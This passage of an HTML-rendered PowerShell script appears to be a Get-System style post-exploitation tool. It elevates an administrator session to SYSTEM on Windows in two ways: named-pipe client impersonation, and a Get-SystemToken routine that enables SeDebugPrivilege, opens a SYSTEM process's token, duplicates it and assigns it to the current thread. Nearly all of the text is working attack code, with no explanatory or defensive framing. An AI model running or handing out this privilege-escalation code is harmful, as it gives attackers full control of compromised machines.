&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $Null = $CloseServiceHandle.Invoke($ManagerHandle)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; else {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # error codes - http://msdn.microsoft.com/en-us/library/windows/desktop/ms681381(v=vs.85).aspx<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Warning "[!] OpenSCManager failed, LastError: $err"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; }<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; if($Success) {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "Waiting for pipe connection"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $Pipe.WaitForConnection()<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $Null = (New-Object System.IO.StreamReader($Pipe)).ReadToEnd()<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $Out = $ImpersonateNamedPipeClient.Invoke([Int]$PipeHandle)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "ImpersonateNamedPipeClient: $Out"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; }<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; # clocse off the named pipe<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Pipe.Dispose()<br/>
&nbsp; &nbsp; }<br/>
<br/>
&nbsp; &nbsp; # performs token duplication to elevate to SYSTEM<br/>
&nbsp; &nbsp; # &nbsp; needs SeDebugPrivilege<br/>
&nbsp; &nbsp; # written by @mattifestation and adapted from https://github.com/obscuresec/shmoocon/blob/master/Invoke-TwitterBot<br/>
&nbsp; &nbsp; Function Local:Get-SystemToken {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; [CmdletBinding()] param()<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $DynAssembly = New-Object Reflection.AssemblyName('AdjPriv')<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $AssemblyBuilder = [Appdomain]::Currentdomain.DefineDynamicAssembly($DynAssembly, [Reflection.Emit.AssemblyBuilderAccess]::Run)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule('AdjPriv', $False)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Attributes = 'AutoLayout, AnsiClass, Class, Public, SequentialLayout, Sealed, BeforeFieldInit'<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TokPriv1LuidTypeBuilder = $ModuleBuilder.DefineType('TokPriv1Luid', $Attributes, [System.ValueType])<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TokPriv1LuidTypeBuilder.DefineField('Count', [Int32], 'Public') | Out-Null<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TokPriv1LuidTypeBuilder.DefineField('Luid', [Int64], 'Public') | Out-Null<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TokPriv1LuidTypeBuilder.DefineField('Attr', [Int32], 'Public') | Out-Null<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TokPriv1LuidStruct = $TokPriv1LuidTypeBuilder.CreateType()<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $LuidTypeBuilder = $ModuleBuilder.DefineType('LUID', $Attributes, [System.ValueType])<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $LuidTypeBuilder.DefineField('LowPart', [UInt32], 'Public') | Out-Null<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $LuidTypeBuilder.DefineField('HighPart', [UInt32], 'Public') | Out-Null<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $LuidStruct = $LuidTypeBuilder.CreateType()<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Luid_and_AttributesTypeBuilder = $ModuleBuilder.DefineType('LUID_AND_ATTRIBUTES', $Attributes, [System.ValueType])<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Luid_and_AttributesTypeBuilder.DefineField('Luid', $LuidStruct, 'Public') | Out-Null<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Luid_and_AttributesTypeBuilder.DefineField('Attributes', [UInt32], 'Public') | Out-Null<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Luid_and_AttributesStruct = $Luid_and_AttributesTypeBuilder.CreateType()<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $ConstructorInfo = [Runtime.InteropServices.MarshalAsAttribute].GetConstructors()[0]<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $ConstructorValue = [Runtime.InteropServices.UnmanagedType]::ByValArray<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $FieldArray = @([Runtime.InteropServices.MarshalAsAttribute].GetField('SizeConst'))<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TokenPrivilegesTypeBuilder = $ModuleBuilder.DefineType('TOKEN_PRIVILEGES', $Attributes, [System.ValueType])<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TokenPrivilegesTypeBuilder.DefineField('PrivilegeCount', [UInt32], 'Public') | Out-Null<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $PrivilegesField = $TokenPrivilegesTypeBuilder.DefineField('Privileges', $Luid_and_AttributesStruct.MakeArrayType(), 'Public')<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder($ConstructorInfo, $ConstructorValue, $FieldArray, @([Int32] 1))<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $PrivilegesField.SetCustomAttribute($AttribBuilder)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TokenPrivilegesStruct = $TokenPrivilegesTypeBuilder.CreateType()<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $AttribBuilder = New-Object Reflection.Emit.CustomAttributeBuilder(<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ([Runtime.InteropServices.DllImportAttribute].GetConstructors()[0]),<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'advapi32.dll',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; @([Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')),<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; @([Bool] $True)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; )<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $AttribBuilder2 = New-Object Reflection.Emit.CustomAttributeBuilder(<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; ([Runtime.InteropServices.DllImportAttribute].GetConstructors()[0]),<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'kernel32.dll',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; @([Runtime.InteropServices.DllImportAttribute].GetField('SetLastError')),<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; @([Bool] $True)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; )<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Win32TypeBuilder = $ModuleBuilder.DefineType('Win32Methods', $Attributes, [ValueType])<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Win32TypeBuilder.DefinePInvokeMethod(<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'OpenProcess',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'kernel32.dll',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Reflection.MethodAttributes] 'Public, Static',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Reflection.CallingConventions]::Standard,<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [IntPtr],<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; @([UInt32], [Bool], [UInt32]),<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Runtime.InteropServices.CallingConvention]::Winapi,<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'Auto').SetCustomAttribute($AttribBuilder2)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Win32TypeBuilder.DefinePInvokeMethod(<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'CloseHandle',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'kernel32.dll',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Reflection.MethodAttributes] 'Public, Static',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Reflection.CallingConventions]::Standard,<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Bool],<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; @([IntPtr]),<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Runtime.InteropServices.CallingConvention]::Winapi,<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'Auto').SetCustomAttribute($AttribBuilder2)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Win32TypeBuilder.DefinePInvokeMethod(<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'DuplicateToken',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'advapi32.dll',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Reflection.MethodAttributes] 'Public, Static',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Reflection.CallingConventions]::Standard,<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Bool],<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; @([IntPtr], [Int32], [IntPtr].MakeByRefType()),<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Runtime.InteropServices.CallingConvention]::Winapi,<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'Auto').SetCustomAttribute($AttribBuilder)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Win32TypeBuilder.DefinePInvokeMethod(<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'SetThreadToken',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'advapi32.dll',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Reflection.MethodAttributes] 'Public, Static',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Reflection.CallingConventions]::Standard,<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Bool],<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; @([IntPtr], [IntPtr]),<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Runtime.InteropServices.CallingConvention]::Winapi,<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'Auto').SetCustomAttribute($AttribBuilder)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Win32TypeBuilder.DefinePInvokeMethod(<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'OpenProcessToken',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'advapi32.dll',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Reflection.MethodAttributes] 'Public, Static',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Reflection.CallingConventions]::Standard,<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Bool],<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; @([IntPtr], [UInt32], [IntPtr].MakeByRefType()),<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Runtime.InteropServices.CallingConvention]::Winapi,<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'Auto').SetCustomAttribute($AttribBuilder)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Win32TypeBuilder.DefinePInvokeMethod(<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'LookupPrivilegeValue',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'advapi32.dll',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Reflection.MethodAttributes] 'Public, Static',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Reflection.CallingConventions]::Standard,<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Bool],<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; @([String], [String], [IntPtr].MakeByRefType()),<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Runtime.InteropServices.CallingConvention]::Winapi,<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'Auto').SetCustomAttribute($AttribBuilder)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Win32TypeBuilder.DefinePInvokeMethod(<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'AdjustTokenPrivileges',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'advapi32.dll',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Reflection.MethodAttributes] 'Public, Static',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Reflection.CallingConventions]::Standard,<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Bool],<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; @([IntPtr], [Bool], $TokPriv1LuidStruct.MakeByRefType(),[Int32], [IntPtr], [IntPtr]),<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Runtime.InteropServices.CallingConvention]::Winapi,<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'Auto').SetCustomAttribute($AttribBuilder)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Win32Methods = $Win32TypeBuilder.CreateType()<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $Win32Native = [Int32].Assembly.GetTypes() | ? {$_.Name -eq 'Win32Native'}<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $GetCurrentProcess = $Win32Native.GetMethod(<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; 'GetCurrentProcess',<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [Reflection.BindingFlags] 'NonPublic, Static'<br/>
&nbsp; &nbsp; &nbsp; &nbsp; )<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; $SE_PRIVILEGE_ENABLED = 0x00000002<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $STANDARD_RIGHTS_REQUIRED = 0x000F0000<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $STANDARD_RIGHTS_READ = 0x00020000<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_ASSIGN_PRIMARY = 0x00000001<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_DUPLICATE = 0x00000002<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_IMPERSONATE = 0x00000004<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_QUERY = 0x00000008<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_QUERY_SOURCE = 0x00000010<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_ADJUST_PRIVILEGES = 0x00000020<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_ADJUST_GROUPS = 0x00000040<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_ADJUST_DEFAULT = 0x00000080<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_ADJUST_SESSIONID = 0x00000100<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_READ = $STANDARD_RIGHTS_READ -bor $TOKEN_QUERY<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_ALL_ACCESS = $STANDARD_RIGHTS_REQUIRED -bor<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_ASSIGN_PRIMARY -bor<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_DUPLICATE -bor<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_IMPERSONATE -bor<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_QUERY -bor<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_QUERY_SOURCE -bor<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_ADJUST_PRIVILEGES -bor<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_ADJUST_GROUPS -bor<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_ADJUST_DEFAULT -bor<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $TOKEN_ADJUST_SESSIONID<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; [long]$Luid = 0<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $tokPriv1Luid = [Activator]::CreateInstance($TokPriv1LuidStruct)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $tokPriv1Luid.Count = 1<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $tokPriv1Luid.Luid = $Luid<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $tokPriv1Luid.Attr = $SE_PRIVILEGE_ENABLED<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $RetVal = $Win32Methods::LookupPrivilegeValue($Null, "SeDebugPrivilege", [ref]$tokPriv1Luid.Luid)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $htoken = [IntPtr]::Zero<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $RetVal = $Win32Methods::OpenProcessToken($GetCurrentProcess.Invoke($Null, @()), $TOKEN_ALL_ACCESS, [ref]$htoken)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $tokenPrivileges = [Activator]::CreateInstance($TokenPrivilegesStruct)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $RetVal = $Win32Methods::AdjustTokenPrivileges($htoken, $False, [ref]$tokPriv1Luid, 12, [IntPtr]::Zero, [IntPtr]::Zero)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; if(-not($RetVal)) {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Error "AdjustTokenPrivileges failed, RetVal : $RetVal" -ErrorAction Stop<br/>
&nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; $LocalSystemNTAccount = (New-Object -TypeName 'System.Security.Principal.SecurityIdentifier' -ArgumentList ([Security.Principal.WellKnownSidType]::'LocalSystemSid', $null)).Translate([Security.Principal.NTAccount]).Value<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $SystemHandle = Get-WmiObject -Class Win32_Process | ForEach-Object {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; try {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $OwnerInfo = $_.GetOwner()<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if ($OwnerInfo.Domain -and $OwnerInfo.User) {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $OwnerString = "$($OwnerInfo.Domain)\$($OwnerInfo.User)".ToUpper()<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if ($OwnerString -eq $LocalSystemNTAccount.ToUpper()) {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $Process = Get-Process -Id $_.ProcessId<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $Handle = $Win32Methods::OpenProcess(0x0400, $False, $Process.Id)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if ($Handle) {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $Handle<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; catch {}<br/>
&nbsp; &nbsp; &nbsp; &nbsp; } | Where-Object {$_ -and ($_ -ne 0)} | Select -First 1<br/>
&nbsp; &nbsp; &nbsp; &nbsp; <br/>
&nbsp; &nbsp; &nbsp; &nbsp; if ((-not $SystemHandle) -or ($SystemHandle -eq 0)) {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Error 'Unable to obtain a handle to a system process.'<br/>
&nbsp; &nbsp; &nbsp; &nbsp; } <br/>
&nbsp; &nbsp; &nbsp; &nbsp; else {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [IntPtr]$SystemToken = [IntPtr]::Zero<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $RetVal = $Win32Methods::OpenProcessToken(([IntPtr][Int] $SystemHandle), ($TOKEN_IMPERSONATE -bor $TOKEN_DUPLICATE), [ref]$SystemToken);$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "OpenProcessToken result: $RetVal"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "OpenProcessToken result: $LastError"<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; [IntPtr]$DulicateTokenHandle = [IntPtr]::Zero<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $RetVal = $Win32Methods::DuplicateToken($SystemToken, 2, [ref]$DulicateTokenHandle);$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "DuplicateToken result: $LastError"<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $RetVal = $Win32Methods::SetThreadToken([IntPtr]::Zero, $DulicateTokenHandle);$LastError = [ComponentModel.Win32Exception][Runtime.InteropServices.Marshal]::GetLastWin32Error()<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; if(-not($RetVal)) {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Error "SetThreadToken failed, RetVal : $RetVal" -ErrorAction Stop<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; }<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Verbose "SetThreadToken result: $LastError"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; $null = $Win32Methods::CloseHandle($Handle)<br/>
&nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; }<br/>
<br/>
&nbsp; &nbsp; if (-not ([Security.Principal.WindowsPrincipal] [Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Write-Error "Script must be run as administrator" -ErrorAction Stop<br/>
&nbsp; &nbsp; }<br/>
<br/>
&nbsp; &nbsp; if([System.Threading.Thread]::CurrentThread.GetApartmentState() -ne 'STA') {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Write-Error "Script must be run in STA mode, relaunch powershell.exe with -STA flag" -ErrorAction Stop<br/>
&nbsp; &nbsp; }<br/>
<br/>
&nbsp; &nbsp; if($PSBoundParameters['WhoAmI']) {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Write-Output "$([Environment]::UserDomainName)\$([Environment]::UserName)"<br/>
&nbsp; &nbsp; &nbsp; &nbsp; return<br/>
&nbsp; &nbsp; }<br/>
<br/>
&nbsp; &nbsp; elseif($PSBoundParameters['RevToSelf']) {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $RevertToSelfAddr = Get-ProcAddress advapi32.dll RevertToSelf<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $RevertToSelfDelegate = Get-DelegateType @() ([Bool])<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $RevertToSelf = [System.Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($RevertToSelfAddr, $RevertToSelfDelegate)<br/>
<br/>
&nbsp; &nbsp; &nbsp; &nbsp; $RetVal = $RevertToSelf.Invoke()<br/>
&nbsp; &nbsp; &nbsp; &nbsp; if($RetVal) {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Output "RevertToSelf successful."<br/>
&nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; else {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Write-Warning "RevertToSelf failed."<br/>
&nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Write-Output "Running as: $([Environment]::UserDomainName)\$([Environment]::UserName)"<br/>
&nbsp; &nbsp; }<br/>
<br/>
&nbsp; &nbsp; else {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; if($Technique -eq 'NamedPipe') {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # if we're using named pipe impersonation with a service<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Get-SystemNamedPipe -ServiceName $ServiceName -PipeName $PipeName<br/>
&nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; else {<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # otherwise use token duplication<br/>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; Get-SystemToken<br/>
&nbsp; &nbsp; &nbsp; &nbsp; }<br/>
&nbsp; &nbsp; &nbsp; &nbsp; Write-Output "Running as: $([Environment]::UserDomainName)\$([Environment]::UserName)"<br/>
&nbsp; &nbsp; }<br/>
}<br/>
</body></html>